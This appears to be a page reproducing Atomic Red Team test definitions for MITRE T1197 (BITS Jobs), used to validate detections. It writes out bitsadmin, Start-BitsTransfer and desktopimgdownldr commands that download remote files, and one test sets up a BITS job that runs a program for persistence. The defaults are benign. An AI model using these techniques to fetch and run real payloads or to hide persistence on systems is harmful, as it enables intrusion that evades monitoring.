(SIGMA) SIGMA_lolbins

June 20, 2022, midnight | 2 weeks, 2 days
            attack_technique: T1197
display_name: BITS Jobs
atomic_tests:
- name: Bitsadmin Download (cmd)
  auto_generated_guid: 3c73d728-75fb-4180-a12f-6712864d7421
  description: |
    This test simulates an adversary leveraging bitsadmin.exe to download
    and execute a payload
  supported_platforms:
  - windows
  input_arguments:
    remote_file:
      description: Remote file to download
      type: url
      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
    local_file:
      description: Local file path to save downloaded file
      type: path
      default: '%temp%\bitsadmin1_flag.ps1'
  executor:
    command: |
      bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file}
    cleanup_command: |
      del #{local_file} >nul 2>&1
    name: command_prompt
- name: Bitsadmin Download (PowerShell)
  auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc
  description: |
    This test simulates an adversary leveraging bitsadmin.exe to download
    and execute a payload leveraging PowerShell

    Upon execution you will find a github markdown file downloaded to the Temp directory
  supported_platforms:
  - windows
  input_arguments:
    remote_file:
      description: Remote file to download
      type: url
      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
    local_file:
      description: Local file path to save downloaded file
      type: path
      default: $env:TEMP\bitsadmin2_flag.ps1
  executor:
    command: |
      Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file}
    cleanup_command: |
      Remove-Item #{local_file} -ErrorAction Ignore
    name: powershell
- name: Persist, Download, & Execute
  auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae
  description: |
    This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transferand execute a payload in multiple steps.
    Note that in this test, the file executed is not the one downloaded. The downloading of a random file is simply the trigger for getting bitsdamin to run an executable.
    This has the interesting side effect of causing the executable (e.g. notepad) to run with an Initiating Process of "svchost.exe" and an Initiating Process Command Line of "svchost.exe -k netsvcs -p -s BITS"
    This job will remain in the BITS queue until complete or for up to 90 days by default if not removed.
  supported_platforms:
  - windows
  input_arguments:
    command_path:
      description: Path of command to execute
      type: path
      default: C:\Windows\system32\notepad.exe
    bits_job_name:
      description: Name of BITS job
      type: string
      default: AtomicBITS
    local_file:
      description: Local file path to save downloaded file
      type: path
      default: '%temp%\bitsadmin3_flag.ps1'
    remote_file:
      description: Remote file to download
      type: url
      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
  executor:
    command: |
      bitsadmin.exe /create #{bits_job_name}
      bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}
      bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} ""
      bitsadmin.exe /resume #{bits_job_name}
      timeout 5
      bitsadmin.exe /complete #{bits_job_name}
    cleanup_command: |
      del #{local_file} >nul 2>&1
    name: command_prompt
- name: Bits download using destktopimgdownldr.exe (cmd)
  auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114
  description: |
    This test simulates using destopimgdwnldr.exe to download a malicious file
    instead of a desktop or lockscreen background img. The process that actually makes 
    the TCP connection and creates the file on the disk is a svchost process (“-k netsvc -p -s BITS”) 
    and not desktopimgdownldr.exe. See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/
  supported_platforms:
  - windows
  input_arguments:
    remote_file:
      description: Remote file to download
      type: url
      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
    download_path:
      description: Local file path to save downloaded file
      type: path
      default: 'SYSTEMROOT=C:\Windows\Temp'
    cleanup_path:
      description: path to delete file as part of cleanup_command
      type: path
      default: C:\Windows\Temp\Personalization\LockScreenImage
    cleanup_file:
      description: file to remove as part of cleanup_command
      type: string
      default: "*.md"
  executor:
    command: |
      set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr
    cleanup_command: |
      del #{cleanup_path}\#{cleanup_file} >null 2>&1
    name: command_prompt
        

Associated Techniques

Comment